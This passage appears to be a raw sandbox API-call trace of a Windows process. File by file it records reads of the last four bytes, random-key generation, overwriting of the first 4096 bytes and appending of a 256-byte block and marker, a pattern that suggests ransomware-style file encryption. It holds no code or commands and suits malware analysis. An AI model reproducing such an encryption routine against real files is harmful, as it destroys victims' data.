0x7d6a3b0 [0074.932] GetProcessHeap () returned 0x280000 [0074.932] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.932] GetProcessHeap () returned 0x280000 [0074.932] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.932] GetProcessHeap () returned 0x280000 [0074.932] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.932] GetProcessHeap () returned 0x280000 [0074.932] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.933] GetProcessHeap () returned 0x280000 [0074.933] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.933] GetProcessHeap () returned 0x280000 [0074.933] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.933] GetProcessHeap () returned 0x280000 [0074.933] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.933] GetProcessHeap () returned 0x280000 [0074.933] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.933] GetProcessHeap () returned 0x280000 [0074.933] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.933] GetProcessHeap () returned 0x280000 [0074.933] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.933] GetProcessHeap () returned 0x280000 [0074.933] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.933] GetProcessHeap () returned 0x280000 [0074.933] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.933] GetProcessHeap () returned 0x280000 [0074.933] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.933] GetProcessHeap () returned 0x280000 [0074.933] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.933] GetProcessHeap () returned 0x280000 [0074.933] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.933] GetProcessHeap () returned 0x280000 [0074.933] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.933] GetProcessHeap () returned 0x280000 [0074.933] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.933] GetProcessHeap () returned 0x280000 [0074.933] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.934] GetProcessHeap () returned 0x280000 [0074.934] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.934] GetProcessHeap () returned 0x280000 [0074.934] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.934] GetProcessHeap () returned 0x280000 [0074.934] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.934] GetProcessHeap () returned 0x280000 [0074.934] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.934] GetProcessHeap () returned 0x280000 [0074.934] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.934] GetProcessHeap () returned 0x280000 [0074.934] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0074.934] GetProcessHeap () returned 0x280000 [0074.934] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.934] GetProcessHeap () returned 0x280000 [0074.934] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0074.934] GetProcessHeap () returned 0x280000 [0074.934] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0074.934] GetProcessHeap () returned 0x280000 [0074.934] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0074.934] GetProcessHeap () returned 0x280000 [0074.934] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0074.934] SetFilePointerEx (in: hFile=0x778, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.934] WriteFile (in: hFile=0x778, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0074.934] WriteFile (in: hFile=0x778, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0074.935] GetProcessHeap () returned 0x280000 [0074.935] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dbcb28 | out: hHeap=0x280000) returned 1 [0074.935] GetProcessHeap () returned 0x280000 [0074.935] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0074.935] GetProcessHeap () returned 0x280000 [0074.935] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0074.935] CloseHandle (hObject=0x778) returned 1 [0074.936] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 9 [0074.936] SetFilePointerEx (in: hFile=0x7c4, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.936] ReadFile (in: hFile=0x7c4, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0074.936] SetFilePointerEx (in: hFile=0x7c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.936] GetProcessHeap () returned 0x280000 [0074.936] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0074.936] GetProcessHeap () returned 0x280000 [0074.936] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0074.936] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0074.936] GetProcessHeap () returned 0x280000 [0074.936] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x8bf0058 [0074.936] ReadFile (in: hFile=0x7c4, lpBuffer=0x8bf0058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesRead=0x722fd08*=0x1000, lpOverlapped=0x0) returned 1 [0074.991] SetFilePointerEx (in: hFile=0x7c4, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0074.991] WriteFile (in: hFile=0x7c4, lpBuffer=0x8bf0058*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesWritten=0x722fd44*=0x1000, lpOverlapped=0x0) returned 1 [0074.992] GetProcessHeap () returned 0x280000 [0074.992] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0074.992] GetProcessHeap () returned 0x280000 [0074.992] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0074.992] GetProcessHeap () returned 0x280000 [0074.992] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9ccf8 [0074.992] GetProcessHeap () returned 0x280000 [0074.992] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0074.992] GetProcessHeap () returned 0x280000 [0074.992] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0074.992] GetProcessHeap () returned 0x280000 [0074.992] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0074.992] GetProcessHeap () returned 0x280000 [0074.992] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.992] GetProcessHeap () returned 0x280000 [0074.992] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.992] GetProcessHeap () returned 0x280000 [0074.992] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.992] GetProcessHeap () returned 0x280000 [0074.992] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.992] GetProcessHeap () returned 0x280000 [0074.992] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.992] GetProcessHeap () returned 0x280000 [0074.992] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.992] GetProcessHeap () returned 0x280000 [0074.992] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.992] GetProcessHeap () returned 0x280000 [0074.992] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.992] GetProcessHeap () returned 0x280000 [0074.992] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.992] GetProcessHeap () returned 0x280000 [0074.993] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.993] GetProcessHeap () returned 0x280000 [0074.993] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.993] GetProcessHeap () returned 0x280000 [0074.993] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.993] GetProcessHeap () returned 0x280000 [0074.993] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.993] GetProcessHeap () returned 0x280000 [0074.993] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.993] GetProcessHeap () returned 0x280000 [0074.993] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.993] GetProcessHeap () returned 0x280000 [0074.993] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.993] GetProcessHeap () returned 0x280000 [0074.993] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.993] GetProcessHeap () returned 0x280000 [0074.993] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.993] GetProcessHeap () returned 0x280000 [0074.993] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.993] GetProcessHeap () returned 0x280000 [0074.993] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.993] GetProcessHeap () returned 0x280000 [0074.993] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.993] GetProcessHeap () returned 0x280000 [0074.993] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.993] GetProcessHeap () returned 0x280000 [0074.993] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.993] GetProcessHeap () returned 0x280000 [0074.993] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.993] GetProcessHeap () returned 0x280000 [0074.993] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.993] GetProcessHeap () returned 0x280000 [0074.993] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.993] GetProcessHeap () returned 0x280000 [0074.993] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.993] GetProcessHeap () returned 0x280000 [0074.993] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.993] GetProcessHeap () returned 0x280000 [0074.994] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0074.994] GetProcessHeap () returned 0x280000 [0074.994] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.994] GetProcessHeap () returned 0x280000 [0074.994] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0074.994] GetProcessHeap () returned 0x280000 [0074.994] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.994] GetProcessHeap () returned 0x280000 [0074.994] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0074.994] GetProcessHeap () returned 0x280000 [0074.994] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.994] GetProcessHeap () returned 0x280000 [0074.994] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0074.994] GetProcessHeap () returned 0x280000 [0074.994] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0074.994] GetProcessHeap () returned 0x280000 [0074.994] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0074.994] GetProcessHeap () returned 0x280000 [0074.994] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0074.994] GetProcessHeap () returned 0x280000 [0074.994] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0074.994] GetProcessHeap () returned 0x280000 [0074.994] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0074.994] GetProcessHeap () returned 0x280000 [0074.994] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.994] GetProcessHeap () returned 0x280000 [0074.994] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0074.994] GetProcessHeap () returned 0x280000 [0074.994] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.994] GetProcessHeap () returned 0x280000 [0074.994] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.994] GetProcessHeap () returned 0x280000 [0074.994] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.994] GetProcessHeap () returned 0x280000 [0074.995] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.995] GetProcessHeap () returned 0x280000 [0074.995] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.995] GetProcessHeap () returned 0x280000 [0074.995] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.995] GetProcessHeap () returned 0x280000 [0074.995] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.995] GetProcessHeap () returned 0x280000 [0074.995] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.995] GetProcessHeap () returned 0x280000 [0074.995] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.995] GetProcessHeap () returned 0x280000 [0074.995] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.995] GetProcessHeap () returned 0x280000 [0074.995] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.995] GetProcessHeap () returned 0x280000 [0074.995] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.995] GetProcessHeap () returned 0x280000 [0074.995] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.995] GetProcessHeap () returned 0x280000 [0074.995] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.995] GetProcessHeap () returned 0x280000 [0074.995] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.995] GetProcessHeap () returned 0x280000 [0074.995] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.995] GetProcessHeap () returned 0x280000 [0074.995] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.995] GetProcessHeap () returned 0x280000 [0074.995] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.996] GetProcessHeap () returned 0x280000 [0074.996] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.996] GetProcessHeap () returned 0x280000 [0074.996] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.996] GetProcessHeap () returned 0x280000 [0074.996] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.996] GetProcessHeap () returned 0x280000 [0074.996] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.996] GetProcessHeap () returned 0x280000 [0074.996] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.996] GetProcessHeap () returned 0x280000 [0074.996] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.996] GetProcessHeap () returned 0x280000 [0074.996] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0074.996] GetProcessHeap () returned 0x280000 [0074.996] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.996] GetProcessHeap () returned 0x280000 [0074.996] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0074.996] GetProcessHeap () returned 0x280000 [0074.996] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0074.996] GetProcessHeap () returned 0x280000 [0074.996] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0074.996] GetProcessHeap () returned 0x280000 [0074.996] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0074.996] SetFilePointerEx (in: hFile=0x7c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.996] WriteFile (in: hFile=0x7c4, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0074.997] WriteFile (in: hFile=0x7c4, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0074.997] GetProcessHeap () returned 0x280000 [0074.997] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8bf0058 | out: hHeap=0x280000) returned 1 [0074.997] GetProcessHeap () returned 0x280000 [0074.997] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0074.997] GetProcessHeap () returned 0x280000 [0074.997] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0074.997] CloseHandle (hObject=0x7c4) returned 1 [0074.998] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 10 [0074.998] SetFilePointerEx (in: hFile=0x784, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.998] ReadFile (in: hFile=0x784, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0074.998] SetFilePointerEx (in: hFile=0x784, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.998] GetProcessHeap () returned 0x280000 [0074.998] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0074.998] GetProcessHeap () returned 0x280000 [0074.998] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0074.998] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0074.998] GetProcessHeap () returned 0x280000 [0074.998] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x8bf0058 [0074.998] ReadFile (in: hFile=0x784, lpBuffer=0x8bf0058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesRead=0x722fd08*=0x1000, lpOverlapped=0x0) returned 1 [0075.047] SetFilePointerEx (in: hFile=0x784, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.048] WriteFile (in: hFile=0x784, lpBuffer=0x8bf0058*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesWritten=0x722fd44*=0x1000, lpOverlapped=0x0) returned 1 [0075.048] GetProcessHeap () returned 0x280000 [0075.048] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0075.048] GetProcessHeap () returned 0x280000 [0075.048] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0075.048] GetProcessHeap () returned 0x280000 [0075.048] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9ccf8 [0075.048] GetProcessHeap () returned 0x280000 [0075.048] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0075.048] GetProcessHeap () returned 0x280000 [0075.048] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0075.048] GetProcessHeap () returned 0x280000 [0075.048] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0075.048] GetProcessHeap () returned 0x280000 [0075.048] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.048] GetProcessHeap () returned 0x280000 [0075.048] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.048] GetProcessHeap () returned 0x280000 [0075.048] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.048] GetProcessHeap () returned 0x280000 [0075.048] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.048] GetProcessHeap () returned 0x280000 [0075.048] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.048] GetProcessHeap () returned 0x280000 [0075.048] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.048] GetProcessHeap () returned 0x280000 [0075.048] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.048] GetProcessHeap () returned 0x280000 [0075.048] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.048] GetProcessHeap () returned 0x280000 [0075.048] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.049] GetProcessHeap () returned 0x280000 [0075.049] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.049] GetProcessHeap () returned 0x280000 [0075.049] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.049] GetProcessHeap () returned 0x280000 [0075.049] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.049] GetProcessHeap () returned 0x280000 [0075.049] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.049] GetProcessHeap () returned 0x280000 [0075.049] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.049] GetProcessHeap () returned 0x280000 [0075.049] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.049] GetProcessHeap () returned 0x280000 [0075.049] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.049] GetProcessHeap () returned 0x280000 [0075.049] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.049] GetProcessHeap () returned 0x280000 [0075.049] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.049] GetProcessHeap () returned 0x280000 [0075.049] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.049] GetProcessHeap () returned 0x280000 [0075.049] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.049] GetProcessHeap () returned 0x280000 [0075.049] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.049] GetProcessHeap () returned 0x280000 [0075.049] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.049] GetProcessHeap () returned 0x280000 